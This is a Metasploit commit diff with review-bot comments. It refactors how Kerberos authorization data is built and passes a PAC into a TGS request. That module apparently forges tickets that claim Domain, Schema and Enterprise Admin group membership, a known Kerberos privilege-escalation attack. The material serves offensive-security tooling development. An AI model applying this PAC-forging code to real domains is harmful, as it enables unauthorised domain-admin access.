Build AuthorizationData from the module

bug/bundler_fix
jvazquez-r7 2014-12-19 18:58:06 -06:00
parent 9bd454d288
commit e6781fcbea
3 changed files with 20 additions and 23 deletions


@ -69,6 +69,20 @@ module Msf
pac_type
end
def build_authorization_data(opts)
pac = opts[:pac] || ''
pac_auth_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
elements: [{:type => Rex::Proto::Kerberos::Pac::AD_WIN2K_PAC, :data => pac}]
)
authorization_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
elements: [{:type => Rex::Proto::Kerberos::Model::AD_IF_RELEVANT, :data => pac_auth_data.encode}]
)
authorization_data
end
end
end
end
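Review bot: The relocated `build_authorization_data` has no YARD comment, although the next builder in the client file it was moved out of is documented with `# @param opts [Hash]`. I would add a header saying that it wraps the encoded PAC in an AD_WIN2K_PAC element and then nests that, encoded, inside an AD_IF_RELEVANT container, with `@option opts [String] :pac` and `@return [Rex::Proto::Kerberos::Model::AuthorizationData]`. The comment should also state that a missing `:pac` falls back to `''`, because `pac = opts[:pac] || ''` then returns a container with an empty PAC element instead of raising, which hides a caller mistake. The trailing `authorization_data` local is redundant; the second `AuthorizationData.new(...)` can be the method's last expression.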


@ -16,14 +16,6 @@ module Msf
realm = opts[:realm] || ''
sname = opts[:sname] || build_server_name(opts)
#pac = build_pac(opts)
#opts.merge!({:pac => pac.encode})
auth_data = build_authorization_data(opts)
opts.merge!({:auth_data => auth_data})
subkey = Rex::Proto::Kerberos::Model::EncryptionKey.new(
type: 23,
#value: Rex::Text.rand_text(16)
@ -32,7 +24,9 @@ module Msf
opts.merge!({:subkey => subkey})
if opts[:auth_data]
enc_auth_data = build_enc_auth_data(opts)
end
body = Rex::Proto::Kerberos::Model::KdcRequestBody.new(
options: options,
@ -87,19 +81,6 @@ module Msf
e_data
end
def build_authorization_data(opts)
pac = opts[:pac] || ''
pac_auth_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
elements: [{:type => Rex::Proto::Kerberos::Pac::AD_WIN2K_PAC, :data => pac}]
)
authorization_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
elements: [{:type => Rex::Proto::Kerberos::Model::AD_IF_RELEVANT, :data => pac_auth_data.encode}]
)
authorization_data
end
# Builds a kerberos pre authenticated information structure for an TGS request
#
# @param opts [Hash]
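Review bot: In the second hunk `enc_auth_data` is assigned only inside `if opts[:auth_data]`, so on the path without authorization data it is an implicit nil when it is read afterwards, presumably by the `KdcRequestBody.new` call whose arguments continue outside the hunk. Ruby defines the local either way, so nothing raises here, but a reader has to know that rule to see what value the body receives. I would make it explicit with `enc_auth_data = opts[:auth_data] ? build_enc_auth_data(opts) : nil` and confirm that the body encoder omits the field when it is nil. Since the caller now supplies the structure, the method's YARD block should list `:auth_data` as an optional `@option`.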


@ -72,6 +72,8 @@ class Metasploit4 < Msf::Auxiliary
logon_time: logon_time,
)
auth_data = build_authorization_data(pac: pac.encode)
res = send_request_tgs(
client_name: 'juan',
server_name: 'krbtgt/DEMO.LOCAL',
@ -82,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary
ticket: ticket,
group_ids: [513, 512, 520, 518, 519],
domain_id: 'S-1-5-21-1755879683-3641577184-3486455962',
pac: pac.encode
auth_data: auth_data
)
unless res.msg_type == 13